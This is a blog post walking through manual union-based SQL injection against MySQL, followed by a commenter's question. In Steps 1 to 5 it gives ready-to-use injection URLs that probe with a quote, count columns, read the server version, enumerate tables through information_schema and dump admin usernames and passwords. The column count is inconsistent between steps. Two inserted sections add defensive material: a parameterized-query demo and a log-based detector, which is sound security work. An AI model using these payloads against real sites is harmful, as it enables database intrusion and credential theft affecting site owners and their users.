Manual PenTest of SQL injection on MySQL.


MySQL is the world's most popular open source database software, with over 100 million copies of its software downloaded or distributed throughout its history. With its superior speed, reliability, and ease of use, MySQL has become the preferred choice for Web, Web 2.0, SaaS, ISV, Telecom companies and forward-thinking corporate IT Managers because it eliminates the major problems associated with downtime, maintenance and administration for modern, online applications.

Many of the world's largest and fastest-growing organizations use MySQL to save time and money powering their high-volume Web sites, critical business systems, and packaged software — including industry leaders such as Yahoo!, Alcatel-Lucent, Google, Nokia, YouTube, Wikipedia, and Booking.com.
The flagship MySQL offering is MySQL Enterprise, a comprehensive set of production-tested software, proactive monitoring tools, and premium support services available in an affordable annual subscription.
MySQL is a key part of LAMP (Linux, Apache, MySQL, PHP / Perl / Python), the fast-growing open source enterprise software stack. More and more companies are using LAMP as an alternative to expensive proprietary software stacks because of its lower cost and freedom from platform lock-in.
MySQL was originally founded and developed in Sweden by two Swedes and a Finn: David Axmark, Allan Larsson and Michael "Monty" Widenius, who had worked together since the 1980s. More historical information on MySQL is available on Wikipedia.

Note: This post is only for educational purposes; the author of this website will not be responsible for any kind of misuse.

Step 1:
How to check for the vulnerability:
Let us assume we have a site with a URL like this: http://www.target.com/images.php?id=1. To test whether it is vulnerable we add a ' (single quote) to the end of the URL, so it becomes http://www.target.com/images.php?id=1' . If we then get an error like "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near  at line 1", the quote has broken the query.
From this error message we also learn that the website is running on a MySQL server.
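Why the quote produces that error, and what removes it, as an added example that is not part of the original post: the lookup below is written in Python against an in-memory SQLite table as a stand-in for the page's images.php?id= query (MySQL is not available offline, and SQLite's error text differs from MySQL's, but a stray quote breaks both grammars the same way). The vulnerable version pastes the id parameter into the SQL text; the hardened version binds it as a parameter, so the same input with a quote is just an id value that matches nothing. Table name, rows and function names are assumptions made for this example.

```python
import sqlite3

# Constructed stand-in for the images.php?id=... lookup discussed above.
# SQLite is used only because it ships with Python; the mechanism shown
# (a quote changing the structure of concatenated SQL) is the same on MySQL.


def make_db():
    """Create a throwaway in-memory table with two sample rows (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE images (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO images VALUES (?, ?)", [(1, "logo.png"), (2, "banner.png")]
    )
    return conn


def lookup_vulnerable(conn, user_id):
    """The pattern Step 1 probes for: the request parameter is pasted straight
    into the SQL text, so a quote in it is parsed as SQL, not as data."""
    sql = "SELECT name FROM images WHERE id=" + user_id
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    """Hardened form: the value travels as a bound parameter and can only ever
    be compared against id; the database never parses it as SQL."""
    return conn.execute(
        "SELECT name FROM images WHERE id=?", (user_id,)
    ).fetchall()


def probe(lookup, user_id):
    """Run one lookup on a fresh table and return ('ok', rows) or
    ('error', message), so the two query styles can be compared directly."""
    conn = make_db()
    try:
        return ("ok", lookup(conn, user_id))
    except sqlite3.Error as exc:
        return ("error", str(exc))
    finally:
        conn.close()


if __name__ == "__main__":
    for user_id in ("1", "1'"):
        print("vulnerable   ", repr(user_id), probe(lookup_vulnerable, user_id))
        print("parameterized", repr(user_id), probe(lookup_parameterized, user_id))
```

The vulnerable lookup returns the row for `1` and a syntax error for `1'`, which is exactly the signal Step 1 relies on; the parameterized lookup returns the row for `1` and an empty result for `1'`, with no error to observe. Turning off verbose database errors in production hides the message but not the flaw; binding parameters removes the flaw.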

Step 2:
How to find the number of columns:
To find the number of columns we use the ORDER BY clause (which tells the database how to order the result). We simply increment the number until we get an error:

http://www.target.com/images.php?id=1 order by 1/* <-- no error
http://www.target.com/images.php?id=1 order by 2/* <-- no error
http://www.target.com/images.php?id=1 order by 3/* <-- no error
http://www.target.com/images.php?id=1 order by 4/* <-- error (we get a message like "Unknown column '4' in 'order clause'" or something similar)

So the query has only 3 columns, because the error appeared at 4.

Step 3:
How to check for UNION:
With UNION we can select more data in one SQL statement, i.e. we request http://www.target.com/images.php?id=1 union all select 1,2,3/* (we already found in Step 2 that the number of columns is 3).
NOTE: if /* is not working or you get some error, then try -- instead; it is a comment and it is important for our query to work properly.
If we see some of the numbers on the screen, i.e. 1 or 2 or 3, then the UNION works :)


Step 4:
How to check the MySQL version:
http://www.target.com/images.php?id=1 union all select 1,2,3,4/*
Let's say we have number 4 on the screen (the number of values in the select list must match the column count found in Step 2; this example assumes four). Now, to check the version, we replace the number 4 with @@version or version() and get something like 4.1.33-log or 5.0.45. The version should be 5 or greater; if it is less than 5, information_schema is not available and you have to guess the table name.

Step 5:
How to get table and column names:
http://www.target.com/images.php?id=1 union all select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()
This gives us the table names. Look for a table such as admin, which holds the login users. Now to check the column names, replace the word "table" with "column":
http://www.target.com/images.php?id=1 union all select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=hex_value
Note: the table name should be given as a hex value (this works in most cases). The columns are then displayed on the screen: user id, passwd etc. Now, to retrieve the values, use:
http://www.target.com/images.php?id=1 union all select 1,concat(username,0x3a,password),3 from admin/*

It will show the usernames and passwords on the screen.
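A detection-side example, added here and not part of the original post: the script below runs the request shapes from Steps 1 to 5 over a handful of constructed access-log lines (documentation-range IPs, fabricated timestamps) and reports, per source address, which step of the walkthrough each request corresponds to and how far the sequence got. It goes slightly beyond the page by URL-decoding twice and matching keywords case-insensitively, since the probes rarely arrive in the exact form shown above. Log format, addresses, rule names and thresholds are all assumptions made for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (combined log format) that reproduce the request
# shapes the walkthrough describes. They are fabricated for this example and
# use documentation-range addresses; nothing here comes from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /images.php?id=1 HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /images.php?id=1' HTTP/1.1" 500 210
203.0.113.5 - - [10/Oct/2023:13:55:48 +0000] "GET /images.php?id=1%20order%20by%204/* HTTP/1.1" 500 233
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /images.php?id=1%20union%20all%20select%201,2,3/* HTTP/1.1" 200 540
203.0.113.5 - - [10/Oct/2023:13:56:30 +0000] "GET /images.php?id=1+UNION+ALL+SELECT+1,2,3,group_concat(table_name)+from+information_schema.tables HTTP/1.1" 200 980
198.51.100.7 - - [10/Oct/2023:13:57:01 +0000] "GET /images.php?id=2 HTTP/1.1" 200 498
"""

# Combined-log-format request line: source IP, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# (stage, name, pattern): one rule per step of the walkthrough, applied to the
# URL-decoded query string. Matching is case-insensitive because SQL keywords are.
RULES = [
    (1, "quote_probe", re.compile(r"'")),
    (2, "order_by_enum", re.compile(r"\border\s+by\s+\d+", re.I)),
    (3, "union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    (4, "version_read", re.compile(r"@@version|\bversion\s*\(\s*\)", re.I)),
    (5, "schema_read", re.compile(r"\binformation_schema\.", re.I)),
]


def decode_query(path):
    """Return the query string of a request path, URL-decoded twice so that a
    single layer of double encoding (%2520 for a space) cannot hide keywords."""
    _, _, query = path.partition("?")
    return unquote_plus(unquote_plus(query))


def classify(line):
    """Parse one log line; return a record with the rules it triggers, or None
    for lines that do not match the log format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = decode_query(m.group("path"))
    hits = [(stage, name) for stage, name, rx in RULES if rx.search(query)]
    return {
        "ip": m.group("ip"),
        "status": int(m.group("status")),
        "query": query,
        "rules": [name for _, name in hits],
        "stage": max((stage for stage, _ in hits), default=0),
    }


def scan(log_text):
    """Return only the suspicious requests, grouped per source IP, so a whole
    enumeration sequence from one client is seen together."""
    per_ip = {}
    for line in log_text.splitlines():
        rec = classify(line)
        if rec and rec["rules"]:
            per_ip.setdefault(rec["ip"], []).append(rec)
    return per_ip


def furthest_stage(per_ip):
    """Map each flagged IP to the furthest step of the walkthrough it reached;
    an address that got past Step 3 is a stronger alert than one lone quote."""
    return {ip: max(r["stage"] for r in recs) for ip, recs in per_ip.items()}


if __name__ == "__main__":
    flagged = scan(SAMPLE_LOG)
    for ip, recs in flagged.items():
        for r in recs:
            print(ip, r["status"], r["rules"], r["query"])
    print(furthest_stage(flagged))
```

On the sample above only 203.0.113.5 is flagged, with four requests climbing from the quote probe to an information_schema read, while the ordinary requests for id=1 and id=2 pass untouched. The 500 responses on the quote and ORDER BY probes are the server-side trace of the syntax errors Steps 1 and 2 rely on, which is why pairing status codes with the query pattern lowers false positives.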

Posted by: Anshuman kak 

Comments

  1. Awesome blog you have here, but I was wanting to know if you knew of any forums that cover the same topics talked about in this article? I'd really like to be a part of a group where I can get suggestions from other experienced people that share the same interest. If you have any recommendations, please let me know. Thank you!
